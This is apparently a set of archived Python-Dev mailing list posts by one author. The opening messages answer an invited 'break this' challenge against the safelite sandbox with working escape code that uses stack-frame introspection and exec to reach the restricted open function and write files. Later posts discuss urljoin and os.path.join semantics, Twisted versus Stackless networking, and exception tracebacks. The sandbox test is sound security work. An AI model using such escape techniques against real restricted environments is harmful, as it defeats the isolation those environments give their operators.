Re: [Python-Dev] Challenge: Please break this! [Now with blog post]
Another hole. Not as devious as some, but easy to fix with yet another type check. And probably you want to get rid of "get_frame" from safelite. This trick notices 'buffering' is passed to open, which does an int coerce of non-int objects. I can look up the stack frames and get "open_file", which I can then use for whatever I want. In this case, I used the hole to reimplement 'open' in its entirety. import safelite class GetAccess(object): def __init__(self, filename, mode, buffering): self.filename = filename self.mode = mode self.buffering = buffering self.f = None def __int__(self): # Get access to the calling frame. # (Strange that that function is available.) frame = safelite.get_frame(1) # Look at that nice function right there. open_file = frame.f_locals["open_file"] # Get around restricted mode locals_d = {} exec """ def breakout(open_file, filename, mode, buffering): return open_file(filename, mode, buffering) """ in frame.f_globals, locals_d del frame # Call the function self.f = locals_d["breakout"](open_file, self.filename, self.mode, self.buffering) # Jump outta here raise TypeError def open(filename, mode="r", buffering=0): get_access = GetAccess(filename, mode, buffering) try: safelite.FileReader("whatever", "r", get_access) except TypeError: return get_access.f f = open("busted.txt", "w") f.write("Broke out of jail!\n") f.close() print "Message is:", repr(open("busted.txt").read()) Andrew Dalke da...@dalkescientific.com ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Challenge: Please break this! [Now with blog post]
Another hole. Not as devious as some, but easy to fix with yet another type check. This trick notices 'buffering' is passed to open, which does an int coerce of non-int objects. I can look up the stack frames and get "open_file", which I can then use for whatever I want. In this case, I used the hole to reimplement 'open' in its entirety. import safelite class GetAccess(object): def __init__(self, filename, mode, buffering): self.filename = filename self.mode = mode self.buffering = buffering self.f = None def __int__(self): # Get access to the calling frame. # (Strange that that function is available, but I # could do it the old-fashioned way and raise/ # catch and exception) frame = safelite.get_frame(1) # Look at that nice function right there. open_file = frame.f_locals["open_file"] # Get around restricted mode locals_d = {} exec """ def breakout(open_file, filename, mode, buffering): return open_file(filename, mode, buffering) """ in frame.f_globals, locals_d del frame # Call the function self.f = locals_d["breakout"](open_file, self.filename, self.mode, self.buffering) # Jump outta here raise TypeError def open(filename, mode="r", buffering=0): get_access = GetAccess(filename, mode, buffering) try: safelite.FileReader("whatever", "r", get_access) except TypeError: return get_access.f f = open("busted.txt", "w") f.write("Broke out of jail!\n") f.close() print "Message is:", repr(open("busted.txt").read()) Andrew Dalke da...@dalkescientific.com ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Challenge: Please break this! [Now with blog post]
tav > But the challenge was about doing `from safelite import FileReader`. Though it doesn't say so on the first post on this thread nor your page at http://tav.espians.com/a-challenge-to-break-python-security.html It says "Now find a way to write to the filesystem from your interpreter". Which is what I did. Who's to say your final implementation will be more secure ;) But I see your point. Perhaps update the description for those misguided souls like me? > This is just a challenge to see if the model holds I haven't been watching this discussion closely and I can't find mention of this - is the goal to support only 2.x or also support Python 3? Your model seems to assume 2.x only, and there may be 3.x attacks that aren't considered in the challenge. For example, in Python 3 I would use the __traceback__ method of the exception object to reach in and get the open function. That seems morally equivalent to what I did. I hacked out the parts of safelite.py which wouldn't work in Python3. Following is a variation on the theme. import safelite try: safelite.FileReader("/dev/null", "r", "x") except TypeError as err: frame = err.__traceback__.tb_next.tb_frame frame.f_locals["open_file"]("test.txt", "w").write("done.") > And instead of trying to make tb_frame go away, I'd like to add the > following to my proposed patch of RESTRICTED attributes: > > * f_code > * f_builtins > * f_globals > * f_locals which of course would make the above no longer work. Cheers, Andrew da...@dalkescientific.com ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Challenge: Please break this! [Now with blog post]
On Tue, Feb 24, 2009 at 3:05 PM, tav wrote: > And instead of trying to make tb_frame go away, I'd like to add the > following to my proposed patch of RESTRICTED attributes: > > * f_code > * f_builtins > * f_globals > * f_locals > > That seems to do the trick... A goal is to use this in App Engine, yes? Which uses cgitb to report errors? Which needs these restricted frame attributes to report the values of variables when the error occurred? Andrew Dalke da...@dalkescientific.com ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Path object design
glyph: > Path manipulation: > > * This is confusing as heck: >>>> os.path.join("hello", "/world") >'/world' >>>> os.path.join("hello", "slash/world") >'hello/slash/world' >>>> os.path.join("hello", "slash//world") >'hello/slash//world' >Trying to formulate a general rule for what the arguments to os.path.join > are supposed to be is really hard. I can't really figure out what it would > be like on a non-POSIX/non-win32 platform. Made trickier by the similar yet different behaviour of urlparse.urljoin. >>> import urlparse >>> urlparse.urljoin("hello", "/world") '/world' >>> urlparse.urljoin("hello", "slash/world") 'slash/world' >>> urlparse.urljoin("hello", "slash//world") 'slash//world' >>> It does not make sense to me that these should be different. Andrew [EMAIL PROTECTED] [Apologies to glyph for the dup; mixed up the reply-to. Still getting used to gmail.] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Path object design
Martin: > Just in case this isn't clear from Steve's and Fredrik's > post: The behaviour of this function is (or should be) > specified, by an IETF RFC. If somebody finds that non-intuitive, > that's likely because their mental model of relative URIs > deviate's from the RFC's model. While I didn't realize that urljoin is only supposed to be used with a base URL, where "base URL" (used in the docstring) has a specific requirement that it be absolute. I instead saw the word "join" and figured it's should do roughly the same things as os.path.join. >>> import urlparse >>> urlparse.urljoin("file:///path/to/hello", "slash/world") 'file:///path/to/slash/world' >>> urlparse.urljoin("file:///path/to/hello", "/slash/world") 'file:///slash/world' >>> import os >>> os.path.join("/path/to/hello", "slash/world") '/path/to/hello/slash/world' >>> It does not. My intuition, nowadays highly influenced by URLs, is that with a couple of hypothetical functions for going between filenames and URLs: os.path.join(absolute_filename, filename) == file_url_to_filename(urlparse.urljoin( filename_to_file_url(absolute_filename), filename_to_file_url(filename))) which is not the case. os.join assumes the base is a directory name when used in a join: "inserting '/' as needed" while RFC 1808 says The last segment of the base URL's path (anything following the rightmost slash "/", or the entire path if no slash is present) is removed Is my intuition wrong in thinking those should be the same? I suspect it is. I've been very glad that when I ask for a directory name that I don't need to check that it ends with a "/". Urljoin's behaviour is correct for what it's doing. os.path.join is better for what it's doing. (And about once a year I manually verify the difference because I get unsure.) I think these should not share the "join" in the name. If urljoin is not meant for relative base URLs, should it raise an exception when misused? Hmm, though the RFC algorithm does not have a failure mode and the result may be a relative URL. Consider >>> urlparse.urljoin("http://blah.com/a/b/c";, "..") 'http://blah.com/a/' >>> urlparse.urljoin("http://blah.com/a/b/c";, "../") 'http://blah.com/a/' >>> urlparse.urljoin("http://blah.com/a/b/c";, "../..") 'http://blah.com/' >>> urlparse.urljoin("http://blah.com/a/b/c";, "../../") 'http://blah.com/' >>> urlparse.urljoin("http://blah.com/a/b/c";, "../../..") 'http://blah.com/' >>> urlparse.urljoin("http://blah.com/a/b/c";, "../../../") 'http://blah.com/../' >>> urlparse.urljoin("http://blah.com/a/b/c";, "../../../..") # What?! 'http://blah.com/' >>> urlparse.urljoin("http://blah.com/a/b/c";, "../../../../") 'http://blah.com/../../' >>> > Of course, there is also the chance that the implementation > deviates from the RFC; that would be a bug. The comment in urlparse # XXX The stuff below is bogus in various ways... is ever so reassuring. I suspect there's a bug given the previous code. Or I've a bad mental model. ;) Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Path object design
Steve: > > I'm darned if I know. I simply know that it isn't right for http resources. /F: > the URI specification disagrees; an URI that starts with "../" is per- > fectly legal, and the specification explicitly states how it should be > interpreted. I have looked at the spec, and can't figure out how its explanation matches the observed urljoin results. Steve's excerpt trimmed out the strangest example. >>> urlparse.urljoin("http://blah.com/a/b/c";, "../../../") 'http://blah.com/../' >>> urlparse.urljoin("http://blah.com/a/b/c";, "../../../..") # What?! 'http://blah.com/' >>> urlparse.urljoin("http://blah.com/a/b/c";, "../../../../") 'http://blah.com/../../' >>> > (it's important to realize that "urijoin" produces equivalent URI:s, not > file names) Both, though, are "paths". The OP, Mik Orr, wrote: I agree that supporting non-filesystem directories (zip files, CSV/Subversion sandboxes, URLs) would be nice, but we already have a big enough project without that. What constraints should a Path object keep in mind in order to be forward-compatible with this? Is the answer therefore that URLs and URI behaviour should not place constraints on a Path object becuse they are sufficiently dissimilar from file-system paths? Do these other non-FS hierarchical structures have similar differences causing a semantic mismatch? Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Path object design
Martin: > Unfortunately, you didn't say which of these you want explained. > As it is tedious to write down even a single one, I restrain to the > one with the What?! remark. > > urlparse.urljoin("http://blah.com/a/b/c";, "../../../..") # What?! > > 'http://blah.com/' The "What?!" is in context with the previous and next entries. I've reduced it to a simpler case >>> urlparse.urljoin("http://blah.com/";, "..") 'http://blah.com/' >>> urlparse.urljoin("http://blah.com/";, "../") 'http://blah.com/../' >>> urlparse.urljoin("http://blah.com/";, "../..") 'http://blah.com/' Does the result make sense to you? Does it make sense that the last of these is shorter than the middle one? It sure doesn't to me. I thought it was obvious that there was an error; obvious enough that I didn't bother to track down why - especially as my main point was to argue there are different ways to deal with hierarchical/path-like schemes, each correct for its given domain. > Please follow me through section 5 of > > http://www.ietf.org/rfc/rfc3986.txt The core algorithm causing the "what?!" comes from "reduce_dot_segments", section 5.2.4. In parallel my 3 cases should give: 5.2.4 Remove Dot Segments remove_dot_segments("/..")r_d_s("/../")r_d_s("/../..") 1. I = "/.." I="/../"I="/../.." O = "" O=""O="" 2A. (does not apply) 2A. (does not apply) 2A. (does not apply) 2B. (does not apply) 2B. (does not apply) 2B. (does not apply) 2C. O="" I="/" 2C. O="" I="/"2C. O="" I="/.." 2A. (does not apply) 2A. (does not apply) .. reduces to r_d_s("/..") 2B. (does not apply) 2B. (does not apply) 3. Result "/" 2C. (does not apply) 2C. (does not apply) 2D. (does not apply) 2D. (does not apply) 2E. O="/", I="" 2E. O="/", I="" 3. Result: "/" 3. Result "/" My reading of the RFC 3986 says all three examples should produce the same result. The fact that my "what?!" comment happens to be correct according to that RFC is purely coincidental. Then again, urlparse.py does *not* claim to be RFC 3986 compliant. The module docstring is """Parse (absolute and relative) URLs. See RFC 1808: "Relative Uniform Resource Locators", by R. Fielding, UC Irvine, June 1995. """ I tried the same code with 4Suite, which does claim compliance, and get >>> import Ft >>> from Ft.Lib import Uri >>> Uri.Absolutize("..", "http://blah.com/";) 'http://blah.com/' >>> Uri.Absolutize("../", "http://blah.com/";) 'http://blah.com/' >>> Uri.Absolutize("../..", "http://blah.com/";) 'http://blah.com/' >>> The text of it's Uri.py says This function is similar to urlparse.urljoin() and urllib.basejoin(). Those functions, however, are (as of Python 2.3) outdated, buggy, and/or designed to produce results acceptable for use with other core Python libraries, rather than being earnest implementations of the relevant specs. Their problems are most noticeable in their handling of same-document references and 'file:' URIs, both being situations that come up far too often to consider the functions reliable enough for general use. """ # Reasons to avoid using urllib.basejoin() and urlparse.urljoin(): # - Both are partial implementations of long-obsolete specs. # - Both accept relative URLs as the base, which no spec allows. # - urllib.basejoin() mishandles the '' and '..' references. # - If the base URL uses a non-hierarchical or relative path, #or if the URL scheme is unrecognized, the result is not #always as expected (partly due to issues in RFC 1808). # - If the authority component of a 'file' URI is empty, #the authority component is removed altogether. If it was #not present, an empty authority component is in the result. # - '.' and '..' segments are not always collapsed as well as they #should be (partly due to issues in RFC 1808). # - Effective Python 2.4, urllib.basejoin() *is* urlparse.urljoin(), #but urlparse.urljoin() is still based on RFC 1808. In searching the archives http://mail.python.org/pipermail/python-dev/2005-September/056152.html Fabien Schwob: > I'm using the module urlparse and I think I've found a bug in the > urlparse module. When you merge an url and a link > like"../../../page.html" with urljoin, the new url created keep some > "../" in it. Here is an example : > > >>> import urlparse > >>> begin = "http://www.example.com/folder/page.html"; > >>> end = "../../../otherpage.html" > >>> urlparse.urljoin(begin, end) > 'http://www.example.com/../../otherpage.html' Guido: > You shouldn't be giving more "../" sequences than are possible. I find > the current behavior acceptable. (Aparently for RFC 1808 that's a valid answer; it was an implementation choice in how to handle that case.) While not directly relevant, postings like John J Lee's http://mail.python.org/pipermail/python-bugs-lis
Re: [Python-Dev] Path object design
Me [Andrew]: > > As this is not a bug, I have added the feature request 1591035 to SF > > titled "update urlparse to RFC 3986". Nothing else appeared to exist > > on that specific topic. Martin: > Thanks. It always helps to be more specific; being less specific often > hurts. So does being more specific. I wasn't trying to report a bug in urlparse. I figured everyone knew the problems existed. The code comments say so and various back discussions on this list say so. All I wanted to do what point out that two seemingly similar problems - path traversal of hierarchical structures - had two different expected behaviors. Now I've spent entirely too much time on specifics I didn't care about and didn't think were important. I've also been known to do the full report and have people ignore what I wrote because it was too long. > I find there is a difference between "urllib behaves > non-intuitively" and "urllib gives result A for parameters B and C, > but should give result D instead". Can you please add specific examples > to your report that demonstrate the difference between implemented > and expected behavior? No. I consider the "../" cases to be unimportant edge cases and I would rather people fixed the other problems highlighted in the text I copied from 4Suite's Uri.py -- like improperly allowing a relative URL as the base url, which I incorrectly assumed was legit - and that others have reported on python-dev, easily found with Google. If I only add test cases for "../" then I believe that that's all that will be fixed. Given the back history of this problem and lack of followup I also believe it won't be fixed unless someone develops a brand new module, from scratch, which will be added to some future Python version. There's probably a compliance suite out there to use for this sort of task. I hadn't bothered to look as I am no more proficient than others here at Google. Finally, I see that my report is a dup. SF search is poor. As Nick Coghlan reported, Paul Jimenez has a replacement for urlparse. Summarized in http://www.python.org/dev/summary/2006-04-01_2006-04-15/ It was submitted in spring as a patch - SF# 1462525 at http://sourceforge.net/tracker/index.php?func=detail&aid=1462525&group_id=5470&atid=305470 which I didn't find in my earlier searching. Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Path object design
Martin: > It still should be possible to come up with examples for these as > well, no? For example, if you pass a relative URI as the base > URI, what would you like to see happen? Until two days ago I didn't even realize that was an incorrect use of urljoin. I can't be the only one. Hence, raise an exception - just like 4Suite's Uri.py does. > That's true. Actually, it's probably not true; it will only get fixed > if some volunteer contributes a fix. And it's not I. A true fix is a lot of work. I would rather use Uri.py, now that I see it handles everything I care about, and then some. Eg, file name <-> URI conversion. > So do you think this patch meets your requirements? # new >>> uriparse.urljoin("http://spam/";, "foo/bar") 'http://spam//foo/bar' >>> # existing >>> urlparse.urljoin("http://spam/";, "foo/bar") 'http://spam/foo/bar' >>> No. That was the first thing I tried. Also found >>> urlparse.urljoin("http://blah";, "/spam/") 'http://blah/spam/' >>> uriparse.urljoin("http://blah";, "/spam/") 'http://blah/spam' >>> I reported these on the patch page. Nothing else strange came up, but I did only try http urls and not the others. My "requirements", meaning my vague, spur-of-the-moment thoughts without any research or experimentation to determing their validity, are different than those for Python. My real requirements are met by the existing code. My imagined ones include support for edge cases, the idna codec, unicode, and real-world use on a variety of OSes. 4Suite's Uri.py seems to have this. Eg, lots of edge-case code like # On Windows, ensure that '|', not ':', is used in a drivespec. if os.name == 'nt' and scheme == 'file': path = path.replace(':','|',1) Hence the uriparse.py patch does not meet my hypothetical requirements . Python's requirements are probably to get closer to the spec. In which case yes, it's at least as good as and likely generally better than the existing module, modulo a few API naming debates and perhaps some rough edges which will be found when put into use. And perhaps various arguments about how bug compatible it should be and if the old code should be available as well as the new one, for those who depend on the existing 1808-allowed implementation dependent behavior. For those I have not the experience to guide me and no care to push the debate. I've decided I'm going to experiment using 4Suite's Uri.py for my code because it handles things I want which are outside of the scope of uriparse.py > This topic (URL parsing) is not only inherently difficult to > implement, it is just as tedious to review. Without anybody > reviewing the contributed code, it's certain that it will never > be incorporated. I have a different opinion. Python's url manipulation code is a mess. urlparse, urllib, urllib2. Why is "urlencode" part of urllib and not urllib2? For that matter, urllib is labeled 'Open an arbitrary URL' and not 'and also do manipulations on parts of URLs." I don't want to start fixing code because doing it the way I want to requires a new API and a much better understanding of the RFCs than I care about, especially since 4Suite and others have already done this. Hence I would say to just grab their library. And perhaps update the naming scheme. Also, urlgrabber and pycURL are better for downloading arbitrary URIs. For some definitions of "better". Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Path object design
Andrew: > >>> urlparse.urljoin("http://blah.com/";, "..") > 'http://blah.com/' > >>> urlparse.urljoin("http://blah.com/";, "../") > 'http://blah.com/../' > >>> urlparse.urljoin("http://blah.com/";, "../..") > 'http://blah.com/' /F: > as I said, today's urljoin doesn't guarantee that the output is > the *shortest* possible way to represent the resulting URI. I didn't think anyone was making that claim. The module claims RFC 1808 compliance. From the docstring: DESCRIPTION See RFC 1808: "Relative Uniform Resource Locators", by R. Fielding, UC Irvine, June 1995. Now quoting from RFC 1808: 5.2. Abnormal Examples Although the following abnormal examples are unlikely to occur in normal practice, all URL parsers should be capable of resolving them consistently. Each example uses the same base as above. An empty reference resolves to the complete base URL: <>= http://a/b/c/d;p?q#f> Parsers must be careful in handling the case where there are more relative path ".." segments than there are hierarchical levels in the base URL's path. My claim is that "consistent" implies "in the spirit of the rest of the RFC" and "to a human trying to make sense of the results" and not only mean "does the same thing each time." Else >>> urljoin("http://blah.com/";, "../../..") 'http://blah.com/there/were/too/many/dot-dot/path/elements/in/the/relative/url' would be equally consistent. >>> for rel in ".. ../ ../.. ../../ ../../.. ../../../ ../../../..".split(): ... print repr(rel), repr(urlparse.urljoin("http://blah.com/";, rel)) ... '..' 'http://blah.com/' '../' 'http://blah.com/../' '../..' 'http://blah.com/' '../../' 'http://blah.com/../../' '../../..' 'http://blah.com/../' '../../../' 'http://blah.com/../../../' '../../../..' 'http://blah.com/../../' I grant there is a consistency there. It's not one most would have predicted beforehand. Then again, "should" is that wishy-washy "unless you've got a good reason to do it a different way" sort of constraint. Andrew [EMAIL PROTECTED] ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Twisted Isn't Specific (was Re: Trial balloon: microthreads library in stdlib)
I was the one on the Stackless list who last September or so proposed the idea of monkeypatching and I'm including that idea in my presentation for PyCon. See my early rough draft at http://www.stackless.com/pipermail/stackless/2007-February/002212.html which contains many details about using Stackless, though none on the Stackless implementation. (A lot on how to tie things together.) So people know, I am an applications programmer and not a systems programmer. Things like OS-specific event mechanisms annoy and frustrate me. If I could do away with hardware and still write useful programs I would. I have tried 3 times to learn Twisted. The first time I found and reported various problems and successes. See emails at http://www.twistedmatrix.com/pipermail/twisted-python/2003-June/thread.html The second time was to investigate a way to report upload progress: http://twistedmatrix.com/trac/ticket/288 and the third was to compare Allegra and Twisted http://www.dalkescientific.com/writings/diary/archive/2006/08/28/levels_of_abstraction.html In all three cases I've found it hard to use Twisted because the code didn't do as I expected it to do and when something went wrong I got results which were hard to interpret. I believe others have similar problems and is one reason Twisted is considered to be "a big, complicated, inseparable hairy mess." I find the Stackless code also hard to understand. Eg, I don't know where the watchdog code is for the "run()" command. It uses several layers of macros and I haven't been able get it straight in my head. However, so far I've not run into strange errors in Stackless that I have in Twisted. I find the normal Python code relatively easy to understand. Stackless only provides threadlets. It does no I/O. Richard Tew developed a "stacklesssocket" module which emulates the API for the stdlib "socket" module. I tweaked it a bit and showed that by doing the monkeypatch import stacklesssocket import sys sys.modules["socket"] = stacklesssocket then code like "urllib.urlopen" became Stackless compatible. Eg, in my PyCon talk draft I show something like import slib # must monkeypatch before any other module imports "socket" slib.use_monkeypatch() import urllib2 import time import hashlib def fetch_and_reverse(host): t1 = time.time() s = urllib2.urlopen("http://"+host+"/";).read()[::-1] dt = time.time() - t1 digest = hashlib.md5(s).hexdigest() print "hash of %r/ = %s in %.2f s" % (host, digest, dt) slib.main_tasklet(fetch_and_reverse)("www.python.org") slib.main_tasklet(fetch_and_reverse)("docs.python.org") slib.main_tasklet(fetch_and_reverse)("planet.python.org") slib.run_all() where the three fetches occur in parallel. The choice of asyncore is, I think, done because 1) it prevents needing an external dependency, 2) asyncore is smaller and easier to understand than Twisted, and 3) it was for demo/proof of concept purposes. While tempting to improve that module I know that Twisted has already gone though all the platform-specific crap and I don't want to go through it again myself. I don't want to write a reactor to deal with GTK, and one for OS X, and one for ... Another reason I think Twisted is considered "tangled-up Deep Magic, only for Wizards Of The Highest Order" is because it's infused with event-based processing. I've done a lot of SAX processing and I can say that few people think that way or want to go through the process of learning how. Compare, for example, the following f = urllib2.urlopen("http://example.com/";) for i, line in enumerate(f): print ("%06d" % i), repr(line) with the normal equivalent in Twisted or other async-based system. Yet by using the Stackless socket monkeypatch, this same code works in an async framework. And the underlying libraries have a much larger developer base than Twisted. Want NNTP? "import nntplib" Want POP3? "import poplib" Plenty of documentation about them too. On the Stackless mailing list I have proposed someone work on a talk for EuroPython titled "Stackless and Twisted". Andrew Francis has been looking into how to do that. All the earlier quotes were lifted from glyph. Here's another: > When you boil it down, Twisted's event loop is just a > notification for "a connection was made", "some data was > received on a connection", "a connection was closed", and > a few APIs to listen or initiate different kinds of > connections, start timed calls, and communicate with threads. > All of the platform details of how data is delivered to the > connections are abstracted away.. How do you propose we > would make a less "specific" event mechanism? What would I need to do to extract this Twisted core so I could replace asyncore? I know at minimum I need "twisted.internet" and "twisted.python" (the latter for logging) and "twisted.persisted" for "styles.Ephemeral". But I say this hesitantly recalling the frustrations I had in dealing with a co
Re: [Python-Dev] Trial balloon: microthreads library in stdlib
On 2/14/07, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote in response to [EMAIL PROTECTED]: > As far as I can tell, you still haven't even clearly expressed what your > needs are, let alone whether or not Twisted is suitable. In the reply > you're citing, you said that "this" sounded like something "low level" that > "twisted would be written on top of" - but the "this" you were talking > about, based on your previous messages, sounded like monkeypatching the > socket and asyncore modules to provide asynchronous file I/O based on the > platform-specific IOCP API for Windows. I don't know Richard's needs nor requirements. I do know the mechanism of the monkeypatch he's talking about. I describe it a bit in my draft for my Stackless talk at PyCon http://www.stackless.com/pipermail/stackless/2007-February/002212.html It uses asyncore for the I/O and a scheduler which can figure out if there are other running tasklets and how long is needed until the next tasklet needs to wake up. Yes, this is another reactor. Yes, it's not widely cross-platform. Yes, it doesn't work with gtk and other GUI frameworks. Yes, as written it doesn't handle threads. But also yes, it's a different style of writing reactors because of how Stackless changes the control flow. I and others would like to see something like the "stacklesssocket" implemented on top of Twisted. Andrew Francis is looking in to it but I don't know to what degree of success he's had. Err, looking through the email archive, he's has had some difficulties in doing a Twisted/Stackless integration. I don't think Twisted people understand Stackless well enough (nor obviously he Twisted) or what he's trying to do. > >It is a large dependency and it is a secondary framework. > > Has it occurred to you that it is a "large" dependency not because we like > making bloated and redundant code, but because it is doing something that is > actually complex and involved? Things like Twisted's support for NNTP, POP3, etc. aren't needed with the monkeypatch approach because the standard Python libraries will work, with Stackless and the underlying asyc library collaborating under the covers. So those parts of Twisted aren't needed or relevant. Twisted is, after all, many things. > I thought that I provided several reasons before as well, but let me state > them as clearly as I can here. Twisted is a large and mature framework with > several years of development and an active user community. The pluggable > event loop it exposes is solving a hard problem, and its implementation > encodes a lot of knowledge about how such a thing might be done. It's also > tested on a lot of different platforms. > > Writing all this from scratch - even a small subset of it - is a lot of > work, and is unlikely to result in something robust enough for use by all > Python programs without quite a lot of effort. It would be a lot easier to > get the Twisted team involved in standardizing event-driven communications > in Python. Every other effort I'm aware of is either much smaller, entirely > proprietary, or both. Again, I would love to be corrected here, and shown > some other large event-driven framework in Python that I was heretofore > unaware of. Sorry for the long quote; wasn't sure how to trim it. I made this point elsewhere and above but feel it's important enough to emphasize once more. Stackless lets people write code which looks like blocking code but which is not. The blocking functions are forwarded to the reactor, which does whatever it's supposed to do, and the results returned. Because most Python networking code will work unchanged (assuming changes to the underlying APIs to work with Stackless, as we hack now through monkeypatches), a microthreads solution almost automatically and trivially gains a large working code base, documentation, and active developer base. There does not need to be "some other large event-driven framework in Python" because all that's needed is the 13kLOC of reactor code from twisted.internet and not 140+kLOC in all of Twisted. > Standardization is much easier to achieve when you have > multiple interested parties with different interests to accommodate. As > Yitzhak Rabin used to say, "you don't engage in API standardization with > your friends, you engage in API standardization with your enemies" - or... > something like that. I thought you made contracts even with -- or especially with -- your friends regarding important matters so that both sides know what they are getting into and so you don't become enemies in the future. > You say that you weren't proposing an alternate implementation of an event > loop core, so I may be reacting to something you didn't say at all. > However, again, at least Tristan thought the same thing, so I'm not the > only one. For demonstration (and for my case pedagogical reasons) we have an event core loop. I would rather pull out the parts I need from Twisted. I don't know how. I don't
Re: [Python-Dev] Twisted Isn't Specific (was Re: Trial balloon: microthreads library in stdlib)
> On Thu, 15 Feb 2007 10:46:05 -0500, "A.M. Kuchling" <[EMAIL PROTECTED]> wrote: > >It's hard to debug the resulting problem. Which level of the *12* > >levels in the stack trace is responsible for a bug? Which of the *6* > >generic calls is calling the wrong thing because a handler was set up > >incorrectly or the wrong object provided? The code is so 'meta' that > >it becomes effectively undebuggable. On 2/15/07, Jean-Paul Calderone <[EMAIL PROTECTED]> wrote, > I've debugged plenty of Twisted applications. So it's not undebuggable. :) Hence the word "effectively". Or are you offering to be on-call within 5 minutes for anyone wanting to debug code? Not very scalable that. The code I was talking about took me an hour to track down and I could only find the location be inserting a "print traceback" call to figure out where I was. > Application code tends to reside at the bottom of the call stack, so Python's > traceback order puts it right where you're looking, which makes it easy to > find. As I also documented, Twisted tosses a lot of the call stack. Here is the complete and full error message I got: Error: [Failure instance: Traceback (failure with no frames): twisted.internet.error.ConnectionRefusedError: Connection was refused by other side: 22: Invalid argument. ] I wrote the essay at http://www.dalkescientific.com/writings/diary/archive/2006/08/28/levels_of_abstraction.html to, among others, show just how hard it is to figure things out in Twisted. > For any bug which causes something to be set up incorrectly and only > later manifests as a traceback, I would posit that whether there is 1 frame or > 12, you aren't going to get anything useful out of the traceback. I posit that tracebacks are useful. Consider: def blah(): make_network_request("A") make_network_request("B") where "A" and "B" are encoded as part of a HTTP POST payload to the same URI. If there's an error in the network connection - eg, the implementation for "B" on the server dies so the connection closes w/o a response - then knowning that the call for "B" failed and not "A" is helpful during debugging. The low level error message cannot report that. Yes, I could put my own try blocks around everything and contextualize all of the error messages so they are semantically correct for the given level of code. But that I would be a lot of code, hard to test, and not cost effective. > Standard practice here is just to make exception text informative, > I think, If you want to think of it as "exception text" then consider that the stack trace is "just" more text for the message. >but this is another general problem with Python programs > and event loops, not one specific to either Twisted itself or the > particular APIs Twisted exposes. The thread is "Twisted Isn't Specific", as a branch of a discussion on microthreads in the standard library. As someone experimenting with Stackless and how it can be used on top of an async library I feel competent enough to comment on the latter topic. As someone who has seen the reverse Bozo bit set by Twisted people on everyone who makes the slightest comment towards using any other async library, and has documented evidence as to just why one might do so, I also feel competent enough to comment on the branch topic. My belief is that there are too many levels of generiticity in Twisted. This makes is hard for an outsider to come in and use the system. By "use" I include 1) understanding how the parts go together, 2) diagnose problems and 3) adding new features that Twisted doesn't support. Life is trade offs. A Twisted trade off is generiticity at the cost of understandability. Remember, this is all my belief, backed by examples where I did try to understand. My experience with other networking packages have been much easier, including with asyncore and Allegra. They are not as general purpose, but it's hard for me to believe the extra layers in Twisted are needed to get that extra whatever functionality. My other belief is that async programming is hard for most people, who would rather do "normal" programming instead of "inside-out" programming. Because of this 2nd belief I am interested in something like Stackless on top of an async library. > As a personal anecdote, I've never once had to chase a bug through any of the > 6 "generic calls" singled out. I can't think of a case where I've helped any > one else who had to do this, either. That part of Twisted is very old, it is > _very_ close to bug-free, and application code doesn't have very much control > over it at all. Perhaps in order to avoid scaring people, there should be a > way to elide frames from a traceback (I don't much like this myself, I worry > about it going wrong and chopping out too much information, but I have heard > other people ask for it)? Even though I said some of this earlier I'll elaborate for clarification. The specific bug I was tracking down had *no* traceback. There w
[Python-Dev] with_traceback
Guido's talk at PyCon said: > Use raise E(arg).with_traceback(tb) > instead of raise E, arg, tb That seems strange to me because of the mutability. Looking through the back discussions on this list I see Guido commented: http://mail.python.org/pipermail/python-3000/2007-February/005689.html > Returning the mutated object is acceptable here > because the *dominant* use case is creating and raising an exception > in one go: > > raise FooException().with_traceback() The 3 argument raise statement is rarely used, in my experience. I believe most don't even know it exists, excepting mostly advanced Python programmers and language lawyers. My concern when I saw Guido's keynote was the worry that people do/might write code like this NO_END_OF_RECORD = ParserError("Cannot find end of record") def parse_record(input_file): ... raise NO_END_OF_RECORD ... That is, create instances at the top of the module, to be used later. This code assume that the NO_END_OF_RECORD exception instance is never modified. If the traceback is added to its __traceback__ attribute then I see two problems if I were to write code like the above: - the traceback stays around "forever" - the code is no longer thread-safe. As an example of code which is affected by this, see pyparsing, which has code that looks like class Token(ParserElement): """Abstract ParserElement subclass, for defining atomic matching patterns."" " def __init__( self ): super(Token,self).__init__( savelist=False ) self.myException = ParseException("",0,"",self) class Literal(Token): def parseImpl( self, instring, loc, doActions=True ): if (instring[loc] == self.firstMatchChar and (self.matchLen==1 or instring.startswith(self.match,loc)) ): return loc+self.matchLen, self.match #~ raise 